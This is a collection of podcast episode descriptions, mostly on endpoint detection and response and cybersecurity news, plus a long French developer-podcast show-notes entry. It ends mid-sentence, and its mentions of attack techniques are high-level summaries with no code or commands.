POPULARITY
How much trust should you put in your Endpoint Detection and Response (EDR) solution? Let's find out with your hosts Kip Boyle, CISO with Cyber Risk Opportunities, and Jake Bernstein, Partner with K&L Gates. Want to quickly come up to speed with the Essential Eight (E8)? Listen to this episode: https://cr-map.com/podcast/63/
Endpoint security tools worked, but the hackers worked harder for their payday.While everyone likes to know how someone else might have screwed up and what the fallout looks like, the more import elements of episodes like this one come from the in-depth conversations about new tactics and strategies that are being used by the bad guys, and simultaneously, the insight on new best practices for the good guys.So while I did enjoy diving into how the ransomware group Akira was able to use webcam access to infiltrate an organization, it was also great to discuss the evolution of these hacking groups, EDR tools, dark web monitoring and the need for better credential security with Steve Ross. He's the director of cybersecurity at S-RM, a leading provider or cyber intelligence and solutions.Watch/listen as we also discuss:Endpoint Detection and Response (EDR) tools.The rise of Akira, and the evolving symbiotic strategies used by this and other RaaS groups.Patching challenges.The growing need for dark web monitoring.The continued rise in login/credential harvesting.As a go-to podcast for our listeners, we want to help you align your brand with our expertise. By sponsoring our podcast, your brand will build trust, and your message will stand out to an audience searching for tools to assist their cybersecurity efforts. Click Here to Become a Sponsor.Promoguy Talk PillsAgency in Amsterdam dives into topics like Tech, AI, digital marketing, and more drama...Listen on: Apple Podcasts SpotifyTo catch up on past episodes, you can go to Manufacturing.net, IEN.com or MBTmag.com. You can also check Security Breach out wherever you get your podcasts, including Apple, Amazon and Overcast. If you have a cybersecurity story or topic that you'd like to have us explore on Security Breach, you can reach me at jeff@ien.com. To download our latest report on industrial cybersecurity, The Industrial Sector's New Battlefield, click here.
In this episode of Cyber Security Today, host Jim Love covers several major cybersecurity incidents and vulnerabilities. Key stories include the compromise of Windows Defender and other Endpoint Detection and Response (EDR) systems, a data breach on X (formerly known as Twitter) exposing over 200 million user records, and a security flaw in several UK-based dating apps that led to the exposure of approximately 1.5 million private images. The discussion highlights how attackers are increasingly using legitimate software tools to bypass security measures, the implications of these breaches for users, and offers practical tips for maintaining robust cybersecurity. 00:00 Introduction to Today's Cyber Security News 00:29 Compromised Endpoint Detection and Response Systems 01:06 Bypassing Windows Defender: Methods and Implications 02:52 Ransomware Tactics and Legitimate Tool Exploits 04:20 Time Traveling Attacks and EDR Limitations 06:33 Massive Data Breach on X (Twitter) 08:30 UK Dating Apps Expose Private Images 10:47 Fraud Alerts and Scams 13:25 Conclusion and Final Thoughts
In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Google has announced a $32 billion ALL CASH acquisition of the Israeli cybersecurity startup Wiz, making it one of the largest deals in the company's history.A newly discovered zero-day vulnerability in Windows allows attackers to escalate privileges, potentially granting them full control over affected systems.Security researchers have identified new intrusion techniques used by the SocGholish malware framework, which is increasingly being leveraged to distribute ransomware.Security researchers have uncovered a new technique that allows attackers to disable Endpoint Detection and Response (EDR) solutions using Windows Defender Application Control (WDAC).Security researchers have discovered undocumented commands in a widely used Bluetooth chip, potentially exposing over a billion devices to security risks.
At ThreatLocker Zero Trust World 2025 in Orlando, Art Ocain, VP of Cybersecurity & Incident Response at Airiam, shared valuable insights into applying zero trust principles to incident response. The conversation, hosted by Marco Ciappelli and Sean Martin, highlighted the critical role of zero trust in preparing for and managing security incidents.The Zero Trust Mindset in Incident Response Ocain discussed how zero trust methodology—embracing the principles of "assume breach" and "always verify, never trust"—can significantly enhance incident response strategies. Instead of merely securing the perimeter or endpoints, his approach involves identifying and protecting core systems through micro-segmentation and robust identity management. By securing each component individually, organizations can minimize the impact of potential breaches.For example, Ocain described a scenario where segmenting a SQL server from an application server could prevent data loss during an attack. Even if an application server is compromised, critical data remains secure, allowing quicker recovery and continuity of operations.Dynamic Containment Strategies Ocain emphasized the importance of dynamic containment when responding to incidents. Traditional methods, such as using Endpoint Detection and Response (EDR) tools, are effective for forensic analysis but may not stop active threats quickly. Instead, he advocated for an "allow list only" approach that restricts access to systems and data, effectively containing threats while maintaining critical business functions.In practice, when Ocain is called into a crisis, he often implements a deny-by-default solution to isolate compromised systems. This strategy allows him to perform forensics and bring systems back online selectively, ensuring threat actors cannot access recovered systems.Balancing Security with Business Needs A significant challenge in adopting zero trust is gaining executive buy-in. Ocain noted that executive teams often push back against zero trust measures, either out of a desire for convenience or because of misconceptions about its impact on business culture. His approach involves demonstrating real-world scenarios where zero trust could mitigate damage during breaches. By focusing on critical systems and showing the potential consequences of compromised identities or systems, Ocain effectively bridges the gap between security and business priorities.A Cultural Shift Toward Security The discussion also touched on the cultural shift required to fully integrate zero trust into an organization. Zero trust is not just a technological framework but a mindset that influences how every employee views access and security. Through scenario-driven exercises and engaging executive teams early in the process, Ocain helps organizations transition from a "department of no" mentality to a collaborative, security-first culture.Listen to the full episode to explore more strategies on implementing zero trust in incident response and how to align security initiatives with business goals.Guest: Art Ocain, VP of Cybersecurity & Incident Response at Airiam | On LinkedIn: https://www.linkedin.com/in/artocain/Hosts:Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber] | On ITSPmagazine: https://www.itspmagazine.com/sean-martinMarco Ciappelli, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining Society Podcast & Audio Signals Podcast | On ITSPmagazine: https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/marco-ciappelli____________________________This Episode's SponsorsThreatLocker: https://itspm.ag/threatlocker-r974____________________________ResourcesLearn more and catch more stories from ZTW 2025 coverage: https://www.itspmagazine.com/zero-trust-world-2025-cybersecurity-and-zero-trust-event-coverage-orlando-floridaRegister for Zero Trust World 2025: https://itspm.ag/threat5mu1____________________________Catch all of our event coverage: https://www.itspmagazine.com/technology-and-cybersecurity-conference-coverageTo see and hear more Redefining CyberSecurity content on ITSPmagazine, visit: https://www.itspmagazine.com/redefining-cybersecurity-podcastTo see and hear more Redefining Society stories on ITSPmagazine, visit:https://www.itspmagazine.com/redefining-society-podcastWant to tell your Brand Story Briefing as part of our event coverage? Learn More
Cybersecurity Today: EDR Evasion, SSH Backdoor, WhatsApp Zero-Click Hack, and DeepSeek AI In today's episode of Cybersecurity Today, host Jim Love discusses several pressing cybersecurity issues. The show covers Canada's Digital Governance Council's launch of a cyber ready validation program designed to help small and medium-sized businesses improve their cybersecurity. Jim then delves into a new cyber attack technique that bypasses Endpoint Detection and Response (EDR) systems, an SSH backdoor used by the Chinese cyber espionage group Evasive Panda, and a zero-click hacking technique targeting WhatsApp users. The episode concludes with insights on the Chinese open-source AI DeepSeek and the importance of nuanced discussion in security debates. Stay tuned for expert interviews on AI and cybersecurity in upcoming episodes. 00:00 Introduction to Cyber Ready Validation Program 00:52 Emerging Cyber Threats: EDR Evasion 04:42 New SSH Backdoor by Evasive Panda 06:31 WhatsApp Zero-Click Exploit 08:03 DeepSeek AI and Security Concerns 10:45 Conclusion and Call for Discussion
In this episode of CISO Tradecraft, host G Mark Hardy discusses the history and evolution of endpoint protection with guest Kieran Human from ThreatLocker. Starting from the inception of antivirus software by John McAfee in the late 1980s, the episode delves into the advancements through Endpoint Detection and Response (EDR) and introduces the latest in endpoint security: allowlisting and ring fencing. The conversation highlights the limitations of traditional antivirus and EDR solutions in today's threat landscape, emphasizing the necessity of default-deny approaches to enhance cybersecurity. Kieran explains how ThreatLocker's allowlisting and ring-fencing capabilities can block unauthorized applications and actions, thus significantly reducing the risk of malware and ransomware attacks. Practical insights, war stories, and deployment strategies are shared to help cybersecurity leaders implement these next-generation tools effectively. Thank you to our sponsor ThreatLocker https://hubs.ly/Q02_HRGK0 Transcripts: https://docs.google.com/document/d/1UMrK44ysBjltNkddCkwx9ly6GJ14tIbC Chapters 00:00 Introduction to Endpoint Protection 00:41 Upcoming Event: CruiseCon 2025 01:18 History of Endpoint Protection 03:34 Evolution of Antivirus to EDR 05:25 Next-Gen Endpoint Protection: Allowlisting 06:44 Guest Introduction: Kieran Human from ThreatLocker 08:06 Benefits of Allowlisting and Ring Fencing 17:14 Challenges and Best Practices 26:19 Conclusion and Call to Action
In this episode of Breaking Badness, we dive deep into the evolving world of Endpoint Detection and Response (EDR) and its critical role in modern cybersecurity. With threats advancing and the sheer volume of endpoint data skyrocketing, AI and deep learning are becoming game changers in threat detection and prevention. Join us as Carl Froggett, CIO at Deep Instinct, and Melissa Bischoping, Senior Director of Security at Tanium, discuss the past, present, and future of EDR, the impact of AI on cybersecurity, and how SOC teams are evolving to stay ahead of bad actors. Learn about how generative AI is influencing attacks, the challenge of SOC burnout, and the innovations shaping the future of endpoint security.
Send us a textEndpoints such as laptops, desktops, mobile devices, and servers remain a prime target for attackers. These devices, serving as gateways to critical business data and systems, are constantly under siege from malware, ransomware, phishing attacks, and other sophisticated threats. As a CISO, safeguarding your organization's endpoints is a matter of cybersecurity and a strategic financial imperative. Here, I will discuss endpoint security, exploring how solutions like antivirus, Endpoint Detection and Response (EDR), and device management align with the Cyber Defense Matrix to protect your organization's assets and financial well-being.Advisory Services: https://www.execcybered.com/advisory-services>>Schedule Call
In this special Black Hat edition of the Breaking Badness Cybersecurity Podcast, Part 1 of a 5 Part Series, we dive deep into how artificial intelligence is transforming the cybersecurity landscape. Our guests—Mark Wojtasiak (VP of Product at Vectra AI), Carl Froggett (CIO at Deep Instinct), Dan Fernandez (Staff Product Manager at Chainguard), and Marcus Ludwig (CEO of Ticura)—join us to explore the evolution of Endpoint Detection and Response (EDR), the growing threats posed by generative AI, and the complexities of securing AI in supply chains. With AI becoming a tool for both attackers and defenders, this episode uncovers the ongoing "AI arms race" and highlights the urgent need for a more preventative approach to cybersecurity.
JVM summit, virtual threads, stacks applicatives, licences, déterminisme et LLMs, quantification, deux outils de l'épisode et bien plus encore. Enregistré le 13 septembre 2024 Téléchargement de l'épisode LesCastCodeurs-Episode–315.mp3 News Langages Netflix utilise énormément Java et a rencontré un problème avec les Virtual Thread dans Java 21. Les ingénieurs de Netflix analysent ce problème dans cet article : https://netflixtechblog.com/java–21-virtual-threads-dude-wheres-my-lock–3052540e231d Les threads virtuels peuvent améliorer les performances mais posent des défis. Un problème de locking a été identifié : les threads virtuels se bloquent mutuellement. Cela entraîne des performances dégradées et des instabilités. Netflix travaille à résoudre ces problèmes et à tirer pleinement parti des threads virtuels. Une syntax pour indiquer qu'un type est nullable ou null-restricted arriverait dans Java https://bugs.openjdk.org/browse/JDK–8303099 Foo! interdirait null Foo? indiquerait que null est accepté Foo?[]! serait un tableau non-null de valeur nullable Il y a aussi des idées de syntaxe pour initialiser les tableaux null-restricted JEP: https://openjdk.org/jeps/8303099 Les vidéos du JVM Language Summit 2024 sont en ligne https://www.youtube.com/watch?v=OOPSU4LnKg0&list=PLX8CzqL3ArzUEYnTa6KYORRbP3nhsK0L1 Project Leyden Update Project Babylon - Code Reflection Valhalla - Where Are We? An Opinionated Overview on Static Analysis for Java Rethinking Java String Concatenation Code Reflection in Action - Translating Java to SPIR-V Java in 2024 Type Specialization of Java Generics - What If Casts Have Teeth ? (avec notre Rémi Forax national !) aussi tip or tail pour tout l'ecosysteme quelques liens sur Babylon: Code reflection pour exprimer des langages etranger (SQL) dans Java: https://openjdk.org/projects/babylon/ et sont example en emulation de LINQ https://openjdk.org/projects/babylon/articles/linq Librairies Micronaut sort sa version 4.6 https://micronaut.io/2024/08/26/micronaut-framework–4–6–0-released/ essentiellement une grosse mise à jour de tonnes de modules avec les dernières versions des dépendances Microprofile 7 faire quelques changements et evolution incompatibles https://microprofile.io/2024/08/22/microprofile–7–0-release/#general enleve Metrics et remplace avec Telemetry (metrics, log et tracing) Metrics reste une spec mais standalone Microprofile 7 depende de Jakarta Core profile et ne le package plus Microprofile OpenAPI 4 et Telemetry 2 amenent des changements incompatibles Quarkus 3.14 avec LetsEncrypt et des serialiseurs JAckson sans reflection https://quarkus.io/blog/quarkus–3–14–1-released/ Hibernate ORM 6.6 Serialisateurs JAckson sans reflection installer des certificats letsencrypt simplement (notamment avec la ligne de commande qui aide sympa notamment avec ngrok pour faire un tunnel vers son localhost retropedalage sur @QuarkusTestResource vs @WithTestResource suite aux retour de OOME et lenteur des tests mieux isolés Les logs structurées dans Spring Boot 3.4 https://spring.io/blog/2024/08/23/structured-logging-in-spring-boot–3–4 Les logs structurées (souvent en JSON) vous permettent de les envoyer facilement vers des backends comme Elastic, AWS CloudWatch… Vous pouvez les lier à du reporting et de l'alerting. Spring Boot 3.4 prend en charge la journalisation structurée par défaut. Il prend en charge les formats Elastic Common Schema (ECS) et Logstash, mais il est également possible de l'étendre avec vos propres formats. Vous pouvez également activer la journalisation structurée dans un fichier. Cela peut être utilisé, par exemple, pour imprimer des journaux lisibles par l'homme sur la console et écrire des journaux structurés dans un fichier pour l'ingestion par machine. Infrastructure CockroachDB qui avait une approche Business Software License (source available puis ALS 3 ans apres), passe maintenant en license proprietaire avec source available https://www.cockroachlabs.com/blog/enterprise-license-announcement/ Polyform project offre des licences standardisees selon les besoins de gratuit vs payant https://polyformproject.org/ Cloud Azure fonctions, comment le demarrage a froid est optimisé https://www.infoq.com/articles/azure-functions-cold-starts/?utm_campaign=infoq_content&utm_source=twitter&utm_medium=feed&utm_term=Cloud fonctions ont une latence naturelle forte toutes les lantences longues ne sont aps impactantes pour le business les demarrages a froid peuvent etre mesures avec les outils du cloud provider donc faites en usage faites des decentilers de latences experience 381 ms cold et 10ms apres tracing pour end to end latence les strategies keep alive pings: reveiller la fonctione a intervalles reguliers pour rester “warm” dans le code de la fonction: initialiser les connections et le chargement des assemblies dans l'initialization configurer dans host.json le batching, desactiver file system logging etc deployer les fonctions as zips reduire al taille du code et des fichiers (qui sont copies sur le serveur froid) sur .net activer ready to run qui aide le JIT compiler instances azure avec plus de CPU et memoire sont plus cher amis baissent le cold start dedicated azure instances pour vos fonctions (pas aprtage avec les autres tenants) ensuite montre des exemples concrets Web Sortie de Vue.js 3.5 https://blog.vuejs.org/posts/vue–3–5 Vue.JS 3.5: Nouveautés clés Optimisations de performance et de mémoire: Réduction significative de la consommation de mémoire (–56%). Amélioration des performances pour les tableaux réactifs de grande taille. Résolution des problèmes de valeurs calculées obsolètes et de fuites de mémoire. Nouvelles fonctionnalités: Reactive Props Destructure: Simplification de la déclaration des props avec des valeurs par défaut. Lazy Hydration: Contrôle de l'hydratation des composants asynchrones. useId(): Génération d'ID uniques stables pour les applications SSR. data-allow-mismatch: Suppression des avertissements de désynchronisation d'hydratation. Améliorations des éléments personnalisés: Prise en charge de configurations d'application, d'API pour accéder à l'hôte et au shadow root, de montage sans Shadow DOM, et de nonce pour les balises. useTemplateRef(): Obtention de références de modèle via l'API useTemplateRef(). Teleport différé: Téléportation de contenu vers des éléments rendus après le montage du composant. onWatcherCleanup(): Enregistrement de callbacks de nettoyage dans les watchers. Data et Intelligence Artificielle On entend souvent parler de Large Language Model quantisés, c'est à dire qu'on utilise par exemple des entiers sur 8 bits plutôt que des floatants sur 32 bits, pour réduire les besoins mémoire des GPU tout en gardant une précision proche de l'original. Cet article explique très visuellement et intuitivement ce processus de quantisation : https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-quantization Guillaume continue de partager ses aventures avec le framework LangChain4j. Comment effectuer de la classification de texte : https://glaforge.dev/posts/2024/07/11/text-classification-with-gemini-and-langchain4j/ en utilisant la classe TextClassification de LangChain4j, qui utilise une approche basée sur les vector embeddings pour comparer des textes similaires en utilisant du few-shot prompting, sous différentes variantes, dans cet autre article : https://glaforge.dev/posts/2024/07/30/sentiment-analysis-with-few-shots-prompting/ et aussi comment faire du multimodal avec LangChain4j (avec le modèle Gemini) pour analyser des textes, des images, mais également des vidéos, du contenu audio, ou bien des fichiers PDFs : https://glaforge.dev/posts/2024/07/25/analyzing-videos-audios-and-pdfs-with-gemini-in-langchain4j/ Pour faire varier la prédictibilité ou la créativité des LLMs, certains hyperparamètres peuvent être ajustés, comme la température, le top-k et le top-p. Mais est-ce que vous savez vraiment comment fonctionnent ces paramètres ? Deux articles très clairs et intuitifs expliquent leur fonctionnement : https://medium.com/google-cloud/is-a-zero-temperature-deterministic-c4a7faef4d20 https://medium.com/google-cloud/beyond-temperature-tuning-llm-output-with-top-k-and-top-p–24c2de5c3b16 la tempoerature va ecraser la probabilite du prochain token mais il reste des variables: approximnation des calculs flottants, stacks differentes effectuants ces choix differemment, que faire en cas d'egalité de probabilité entre deux tokens mais il y a d'atures apporoches de configuiration des reaction du LLM: top-k (qui evite les tokens peu frequents), top-p pour avoir les n des tokens qui totalient p% des probabilités temperature d'abord puis top-k puis top-p explique quoi utiliser quand OSI propose une definition de l'IA open source https://www.technologyreview.com/2024/08/22/1097224/we-finally-have-a-definition-for-open-source-ai/ gros debats ces derniers mois utilisable pour tous usages sans besoin de permission chercheurs peuvent inspecter les components et etudier comment le system fonctionne systeme modifiable pour tout objectif y compris chager son comportement et paratger avec d'autres avec ou sans modification quelque soit l'usage Definit des niveaux de transparence (donnees d'entranement, code source, poids) Une longue rétrospective de PostgreSQL a des volumes de malades et les problèmes de lock https://ardentperf.com/2024/03/03/postgres-indexes-partitioning-and-lwlocklockmanager-scalability/ un article pour vous rassurer que vous n'aurez probablement jamais le problème histoire sous forme de post mortem des conseils pour éviter ces falaises Outillage Un premier coup d'oeil à la future notation déclarative de Gradle https://blog.gradle.org/declarative-gradle-first-eap un article qui explique à quoi ressemble cette nouvelle syntaxe déclarative de Gradle (en plus de Groovy et Kotlin) Quelques vidéos montrent le support dans Android Studio, pour le moment, ainsi que dans un outil expérimental, en attendant le support dans tous les IDEs L'idée est d'éviter le scripting et d'avoir vraiment qu'une description de son build Cela devrait améliorer la prise en charge de Gradle dans les IDEs et permettre d'avoir de la complétion rapide, etc c'est moi on on a Maven là? Support de Firefox dans Puppeteer https://hacks.mozilla.org/2024/08/puppeteer-support-for-firefox/ Puppeteer, la bibliothèque d'automatisation de navigateur, supporte désormais officiellement Firefox dès la version 23. Cette avancée permet aux développeurs d'écrire des scripts d'automatisation et d'effectuer des tests de bout en bout sur Chrome et Firefox de manière interchangeable. L'intégration de Firefox dans Puppeteer repose sur WebDriver BiDi, un protocole inter-navigateurs en cours de standardisation au W3C. WebDriver BiDi facilite la prise en charge de plusieurs navigateurs et ouvre la voie à une automatisation plus simple et plus efficace. Les principales fonctionnalités de Puppeteer, telles que la capture de journaux, l'émulation de périphériques, l'interception réseau et le préchargement de scripts, sont désormais disponibles pour Firefox. Mozilla considère WebDriver BiDi comme une étape importante vers une meilleure expérience de test inter-navigateurs. La prise en charge expérimentale de CDP (Chrome DevTools Protocol) dans Firefox sera supprimée fin 2024 au profit de WebDriver BiDi. Bien que Firefox soit officiellement pris en charge, certaines API restent non prises en charge et feront l'objet de travaux futurs. Guillaume a créé une annotation @Retry pour JUnit 5, pour retenter l'exécution d'un test qui est “flaky” https://glaforge.dev/posts/2024/09/01/a-retryable-junit–5-extension/ Guillaume n'avait pas trouvé d'extension par défaut dans JUnit 5 pour remplacer les Retry rules de JUnit 4 Mais sur les réseaux sociaux, une discussion intéressante s'ensuit avec des liens sur des extensions qui implémentent cette approche Comme JUnit Pioneer qui propose plein d'extensions utiles https://junit-pioneer.org/docs/retrying-test/ Ou l'extension rerunner https://github.com/artsok/rerunner-jupiter Arnaud a aussi suggéré la configuration de Maven Surefire pour relancer automatiquement les tests qui ont échoué https://maven.apache.org/surefire/maven-surefire-plugin/examples/rerun-failing-tests.html la question philosophique est: est-ce que c'est tolerable les tests qui ecouent de façon intermitente Architecture Un ancien fan de GraphQL en a fini avec la technologie GraphQL et réfléchit aux alternatives https://bessey.dev/blog/2024/05/24/why-im-over-graphql/ Problèmes de GraphQL: Sécurité: Attaques d'autorisation Difficulté de limitation de débit Analyse de requêtes malveillantes Performance: Problème N+1 (récupération de données et autorisation) Impact sur la mémoire lors de l'analyse de requêtes invalides Complexité accrue: Couplage entre logique métier et couche de transport Difficulté de maintenance et de tests Solutions envisagées: Adoption d'API REST conformes à OpenAPI 3.0+ Meilleure documentation et sécurité des types Outils pour générer du code client/serveur typé Deux approches de mise en œuvre d'OpenAPI: “Implementation first” (génération de la spécification à partir du code) “Specification first” (génération du code à partir de la spécification) retour interessant de quelqu'un qui n'utilise pas GraphQL au quotidien. C'était des problemes qui devaient etre corrigés avec la maturité de l'ecosysteme et des outils mais ca a montré ces limites pour cette personne. Prensentation de Grace Hoper en 1980 sur le future des ordinateurs. https://youtu.be/AW7ZHpKuqZg?si=w_o5_DtqllVTYZwt c'est fou la modernité de ce qu'elle décrit Des problèmes qu'on a encore aujourd'hui positive leadership Elle décrit l'avantage de systèmes fait de plusieurs ordinateurs récemment declassifié Leader election avec les conditional writes sur les buckets S3/GCS/Azure https://www.morling.dev/blog/leader-election-with-s3-conditional-writes/ L'élection de leader est le processus de choisir un nœud parmi plusieurs pour effectuer une tâche. Traditionnellement, l'élection de leader se fait avec un service de verrouillage distribué comme ZooKeeper. Amazon S3 a récemment ajouté le support des écritures conditionnelles, ce qui permet l'élection de leader sans service séparé. L'algorithme d'élection de leader fonctionne en faisant concourir les nœuds pour créer un fichier de verrouillage dans S3. Le fichier de verrouillage inclut un numéro d'époque, qui est incrémenté à chaque fois qu'un nouveau leader est élu. Les nœuds peuvent déterminer s'ils sont le leader en listant les fichiers de verrouillage et en vérifiant le numéro d'époque. attention il peut y avoir plusieurs leaders élus (horloges qui ont dérivé) donc c'est à gérer aussi Méthodologies Guillaume Laforge interviewé par Sfeir, où il parle de l'importance de la curiosité, du partage, de l'importance de la qualité du code, et parsemé de quelques photos des Cast Codeurs ! https://www.sfeir.dev/success-story/guillaume-laforge-maestro-de-java-et-esthete-du-code-propre/ Sécurité Comment crowdstrike met a genoux windows et de nombreuses entreprises https://next.ink/144464/crowdstrike-donne-des-details-techniques-sur-son-fiasco/ l'incident vient de la mise à jour de la configuration de Falcon l'EDR de crowdstrike https://www.crowdstrike.com/blog/falcon-update-for-windows-hosts-technical-details/ qu'est ce qu'un EDR? Un système Endpoint Detection and Response a pour but de surveiller votre machine ( access réseaux, logs, …) pour detecter des usages non habituels. Cet espion doit interagir avec les couches basses du système (réseau, sockets, logs systems) et se greffe donc au niveau du noyau du système d'exploitation. Il remonte les informations en live à une plateforme qui peut ensuite adapter les réponse en live si l'incident a duré moins de 1h30 coté crowdstrike plus de 8 millions de machines se sont retrouvées hors service bloquées sur le Blue Screen Of Death selon Microsoft https://blogs.microsoft.com/blog/2024/07/20/helping-our-customers-through-the-crowdstrike-outage/ cela n'est pas la première fois et était déjà arrivé il y a quelques mois sur Linux. Comme il s'agissait d'une incompatibilité de kernel il avait été moins important car les services ITs gèrent mieux ces problèmes sous Linux https://stackdiary.com/crowdstrike-took-down-debian-and-rocky-linux-a-few-months-ago-and-no-one-noticed/ Les benchmarks CIS, un pilier pour la sécurité de nos environnements cloud, et pas que ! (Katia HIMEUR TALHI) https://blog.cockpitio.com/security/cis-benchmarks/ Le CIS est un organisme à but non lucratif qui élabore des normes pour améliorer la cybersécurité. Les référentiels CIS sont un ensemble de recommandations et de bonnes pratiques pour sécuriser les systèmes informatiques. Ils peuvent être utilisés pour renforcer la sécurité, se conformer aux réglementations et normaliser les pratiques. Loi, société et organisation Microsoft signe un accord avec OVHCloud pour qu'il arretent leur plaine d'antitrust https://www.politico.eu/article/microsoft-signs-antitrust-truce-with-ovhcloud/ la plainte était en Europe mermet a des clients de plus facilement deployer les solutions Microsoft dans le fournisseur de cloud de leur choix la plainte avait ete posé à l'été 2021 ca rendait faire tourner les solutions MS plus cheres et non competitives vs MS ElasticSearch et Kibana sont de nouveau Open Source, en ajoutant la license AGPL à ses autres licences existantes https://www.elastic.co/fr/blog/elasticsearch-is-open-source-again le marché d'il y a trois ans et maintenant a changé AWS est une bon partenaire le flou Elasticsearch vs le produit d'AWS s'est clarifié donc retour a l'open source via AGPL Affero GPL Elastic n'a jamais cessé de croire en l'open source d'après Shay Banon son fondateur Le changement vers l'AGPL est une option supplémentaire, pas un remplacement d'une des autres licences existantes et juste apres, Elastic annonce des resultants decevants faisant plonger l'action de 25% https://siliconangle.com/2024/08/29/elastic-shares-plunge–25-lower-revenue-projections-amid-slower-customer-commitments/ https://unrollnow.com/status/1832187019235397785 et https://www.elastic.co/pricing/faq/licensing pour un résumé des licenses chez elastic Outils de l'épisode MailMate un client email Markdown et qui gere beaucoup d'emails https://medium.com/@nicfab/mailmate-a-powerful-client-email-for-macos-markdown-integrated-email-composition-e218fe2accf3 Emmanuel l'utilise sur les boites email secondaires un peu lent a demarrer (synchro) et le reste est rapide boites virtuelles (par requete) SpamSieve Que macOS je crois Trippy, un analyseur de réseau https://github.com/fujiapple852/trippy Il regroupe dans une CLI traceroute et ping Conférences La liste des conférences provenant de Developers Conferences Agenda/List par Aurélie Vache et contributeurs : 17 septembre 2024 : We Love Speed - Nantes (France) 17–18 septembre 2024 : Agile en Seine 2024 - Issy-les-Moulineaux (France) 19–20 septembre 2024 : API Platform Conference - Lille (France) & Online 20–21 septembre 2024 : Toulouse Game Dev - Toulouse (France) 25–26 septembre 2024 : PyData Paris - Paris (France) 26 septembre 2024 : Agile Tour Sophia-Antipolis 2024 - Biot (France) 2–4 octobre 2024 : Devoxx Morocco - Marrakech (Morocco) 3 octobre 2024 : VMUG Montpellier - Montpellier (France) 7–11 octobre 2024 : Devoxx Belgium - Antwerp (Belgium) 8 octobre 2024 : Red Hat Summit: Connect 2024 - Paris (France) 10 octobre 2024 : Cloud Nord - Lille (France) 10–11 octobre 2024 : Volcamp - Clermont-Ferrand (France) 10–11 octobre 2024 : Forum PHP - Marne-la-Vallée (France) 11–12 octobre 2024 : SecSea2k24 - La Ciotat (France) 15–16 octobre 2024 : Malt Tech Days 2024 - Paris (France) 16 octobre 2024 : DotPy - Paris (France) 16–17 octobre 2024 : NoCode Summit 2024 - Paris (France) 17–18 octobre 2024 : DevFest Nantes - Nantes (France) 17–18 octobre 2024 : DotAI - Paris (France) 30–31 octobre 2024 : Agile Tour Nantais 2024 - Nantes (France) 30–31 octobre 2024 : Agile Tour Bordeaux 2024 - Bordeaux (France) 31 octobre 2024–3 novembre 2024 : PyCon.FR - Strasbourg (France) 6 novembre 2024 : Master Dev De France - Paris (France) 7 novembre 2024 : DevFest Toulouse - Toulouse (France) 8 novembre 2024 : BDX I/O - Bordeaux (France) 13–14 novembre 2024 : Agile Tour Rennes 2024 - Rennes (France) 16–17 novembre 2024 : Capitole Du Libre - Toulouse (France) 20–22 novembre 2024 : Agile Grenoble 2024 - Grenoble (France) 21 novembre 2024 : DevFest Strasbourg - Strasbourg (France) 21 novembre 2024 : Codeurs en Seine - Rouen (France) 27–28 novembre 2024 : Cloud Expo Europe - Paris (France) 28 novembre 2024 : Who Run The Tech ? - Rennes (France) 2–3 décembre 2024 : Tech Rocks Summit - Paris (France) 3 décembre 2024 : Generation AI - Paris (France) 3–5 décembre 2024 : APIdays Paris - Paris (France) 4–5 décembre 2024 : DevOpsRex - Paris (France) 4–5 décembre 2024 : Open Source Experience - Paris (France) 5 décembre 2024 : GraphQL Day Europe - Paris (France) 6 décembre 2024 : DevFest Dijon - Dijon (France) 22–25 janvier 2025 : SnowCamp 2025 - Grenoble (France) 30 janvier 2025 : DevOps D-Day #9 - Marseille (France) 6–7 février 2025 : Touraine Tech - Tours (France) 3 avril 2025 : DotJS - Paris (France) 16–18 avril 2025 : Devoxx France - Paris (France) Nous contacter Pour réagir à cet épisode, venez discuter sur le groupe Google https://groups.google.com/group/lescastcodeurs Contactez-nous via twitter https://twitter.com/lescastcodeurs Faire un crowdcast ou une crowdquestion Soutenez Les Cast Codeurs sur Patreon https://www.patreon.com/LesCastCodeurs Tous les épisodes et toutes les infos sur https://lescastcodeurs.com/
Dmitri Alperovitch is the Co-Founder and former CTO of Crowdstrike, one of the most valuable cybersecurity companies founded in the modern era that defined the Endpoint Detection and Response (EDR) category. On today's episode, Jon Sakoda speaks with Dmitri on why email security was one of the best places to learn cybersecurity, the hardest parts of finding product-market fit in a new category, and how all of his learnings inside of larger companies ultimately inspired him to start Crowdstrike:Why E-Mail Security Was the Best Place to Learn About Adversaries [7:15 - 14:32] - Dmitri's early career at CipherTrust put him on the front lines of stopping email spam. This was a rapidly changing field that taught him that adversaries could make changes in hours, not days or weeks. This mindset taught him that there are no silver bullets and that our defenses must always adapt quickly to ever changing threats.Building a Services and Software Company Together to Own the Category [33:53 - 39:34] - In the early days of Crowdstrike, the team built an elite services team that gave them insight into how nation state adversaries were breaching customers. This gave them unique lead generation and IP that helped them build their endpoint security solution which ultimately became the category leader in EDR.How Targeting Existing Budgets Unlocked Revenue Growth [39:35 - 45:15] - Crowdstrike early on complemented existing AV solutions with an advanced EDR and IR offering, primarily targeting companies who understood nation state attacks. Their revenue growth accelerated when they offered to replace traditional anti-virus and could access existing budgets for endpoint security. This move ultimately gave them a much larger TAM leading up to their IPO.
Send us a textEver wondered what it takes to stay one step ahead of cybercriminals? This episode, featuring cybersecurity expert Chris Hale, promises to unravel the complexities of safeguarding digital fortresses while sharing invaluable lessons from the frontlines. Chris's journey from a help desk technician to the founder of his own cybersecurity firm is nothing short of inspiring. His early interest in computers, paired with a dual major in Exercise Sport Science and Computer Information Systems, laid the foundation for a career that would see him tackling email viruses at Sports Authority and defending against sophisticated malware and ransomware attacks.The conversation shifts to the high-stakes world of incident response teams, where Chris recounts a harrowing ransomware incident caused by the absence of two-factor authentication on a global admin account. The relentless effort required to handle such crises, including long hours and meticulous post-mortem analyses, underscores the critical role of managed service providers (MSPs) and managed security service providers (MSSPs) in maintaining robust security practices and compliance. Chris's firsthand experiences highlight the importance of hands-on training and continuous learning, offering listeners a realistic glimpse into the demands and rewards of a career in cybersecurity.We also navigate the evolving threat landscape, discussing the necessity of quarterly audits, penetration testing, and consistent security practices across global enterprises. Chris shares insights into the importance of continuous cybersecurity training for all organizational levels, using tools like Breach Secure Now to keep 